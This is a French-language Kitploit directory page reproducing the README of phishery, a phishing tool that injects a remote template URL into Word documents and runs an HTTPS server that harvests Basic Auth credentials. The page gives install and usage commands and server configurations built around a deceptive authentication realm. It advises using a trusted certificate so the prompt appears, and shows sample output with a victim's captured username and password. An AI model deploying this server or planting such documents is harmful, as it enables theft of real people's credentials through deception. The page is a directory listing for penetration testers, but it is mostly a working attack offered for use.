Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
phishery — Un récolteur d'identifiants avec authentification de base activé par SSL et un injecteur d'URL dans un modèle de document Word | Kitploit
Outils/GitHubGitHub/ryhanson/phishery
Outils de PhishingHameçonnageSécurité WebIngénierie Sociale
GitHubryhanson/phishery

phishery

Un récolteur d'identifiants avec authentification de base activé par SSL et un injecteur d'URL dans un modèle de document Word

Voir le dépôt
1.0k2024il y a 9 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

phishery

Phishery est un serveur HTTP simple avec SSL dont le but principal est le hameçonnage d'identifiants via l'authentification de base. Phishery offre également la possibilité d'injecter facilement l'URL dans un document Word .docx.

Boîte de dialogue d'authentification de base dans Word

La puissance de phishery est mieux démontrée en définissant le modèle d'un document Word sur une URL phishery. Cela amène Microsoft Word à faire une requête à l'URL, ce qui affiche une boîte de dialogue d'authentification à l'utilisateur final. La possibilité d'injecter n'importe quel fichier .docx avec une URL est possible en utilisant les options -i [in docx], -o [out docx] et -u [url] de phishery.

Téléchargement

Des paquets spécifiques au système d'exploitation peuvent être téléchargés depuis ici.

Installation

Extrayez l'archive et, éventuellement, installez le binaire dans $PATH

root@kitploit:~
$ tar -xzvf phishery*.tar.gz
$ cd phishery*
$ cp phishery /usr/local/bin

Utilisation

root@kitploit:~
$ phishery --help

|\   \\\\__   O         __    _      __
| \_/    o \  o  ____  / /_  (_)____/ /_  ___  _______  __
> _   (( <_ oO  / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /
| / \__+___/   / /_/ / / / / (__  ) / / /  __/ /  / /_/ /
|/     |/     / .___/_/ /_/_/____/_/ /_/\___/_/   \__, /
             /_/ Basic Auth Credential Harvester (____/
                 with Word Doc Template Injector

  Start the server  : phishery -s settings.json -c credentials.json
  Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx

  Options:
    -h, --help      Show usage and exit.
    -v              Show version and exit.
    -s              The JSON settings file used to setup the server. [default: "settings.json"]
    -c              The JSON file to store harvested credentials. [default: "credentials.json"]
    -u              The phishery URL to use as the Word document template.
    -i              The Word .docx file to inject with a template URL.
    -o              The new Word .docx file with the injected template URL.
Exécution du serveur

Modifiez le fichier settings.json fourni selon vos besoins, par défaut il devrait ressembler à ceci :

root@kitploit:~
{
  "ip": "0.0.0.0",
  "port": "443",
  "sslCert": "server.crt",
  "sslKey": "server.key",
  "basicRealm": "Secure Document Gateway",
  "responseStatus": 200,
  "responseFile": "template.dotx",
  "responseHeaders": [
    ["Content-Type", "application/vnd.openxmlformats-officedocument.wordprocessingml.template"]
  ]
}

Cette configuration démarrera le serveur HTTP sur le port 443 avec SSL configuré pour utiliser server.crt et server.key. Le domaine d'authentification de base est défini sur Secure Document Gateway. Lorsque des identifiants sont fournis, un statut de réponse 200 est envoyé avec le contenu du fichier template.dotx inclus et l'en-tête de type de contenu : Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.template.

Le fichier de paramètres peut également être configuré pour afficher un corps simple, en utilisant responseBody, comme ceci :

root@kitploit:~
{
  "ip": "0.0.0.0",
  "port": "443",
  "sslCert": "server.crt",
  "sslKey": "server.key",
  "basicRealm": "Secure Document Gateway",
  "responseStatus": 404,
  "responseBody": "<h1>Not Found</h1>",
  "responseHeaders": [
    ["Content-Type", "text/html"]
  ]
}

L'efficacité de cet outil repose principalement sur le domaine et le domaine d'authentification de base utilisés, car c'est souvent tout ce que l'utilisateur final verra lorsqu'il est déclenché à partir d'un document Office. Assurez-vous de pointer vos enregistrements DNS A vers l'IP publique du serveur phishery.

Il est recommandé de remplacer le certificat fourni par un certificat de confiance, comme celui généré avec LetsEncrypt. Microsoft Word sur OS X empêchera la boîte de dialogue d'authentification si le certificat est invalide, et Microsoft Word sur Windows invitera l'utilisateur à accepter le certificat invalide.

Une fois le serveur configuré et en cours d'exécution, tout ce que vous avez à faire est d'intégrer une URL phishery dans un document, ou ailleurs où vous le souhaitez. phishery vous donne la possibilité d'injecter votre URL dans un document Word en tant que modèle, les instructions pour le faire se trouvent ci-dessous.

Injection d'un document Word

Pour injecter une URL de modèle dans un document Word, vous aurez besoin d'un fichier .docx et de l'URL du serveur phishery.

Exécutez maintenant phishery avec votre document et votre URL :

root@kitploit:~
$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
[+] Opening Word document: good.docx
[+] Setting Word document template to: https://secure.site.local/docs
[+] Saving injected Word document to: bad.docx
[*] Injected Word document has been saved!

Assurez-vous que votre serveur phishery est en cours d'exécution et accessible à l'URL que vous avez utilisée. Maintenant, lorsque le document Word est ouvert, la victime sera invitée avec une boîte de dialogue d'authentification.

Maintenant, lorsque la victime ouvre le document, vous verrez ce qui suit :

root@kitploit:~
$ ./phishery
[+] Credential store initialized at: credentials.json
[+] Starting HTTPS Auth Server on: 0.0.0.0:443
[*] Request Received at 2016-09-25 01:06:28: HEAD https://secure.site.local/docs
[*] Sending Basic Auth response to: 127.0.0.1
[*] New credentials harvested!
[HTTP] Host        : secure.example.local
[HTTP] Request     : /docs
[HTTP] User Agent  : Microsoft Office Word
[HTTP] IP Address  : 127.0.0.1
[AUTH] Username    : john.doe
[AUTH] Password    : Summer15
Télécharger l’outil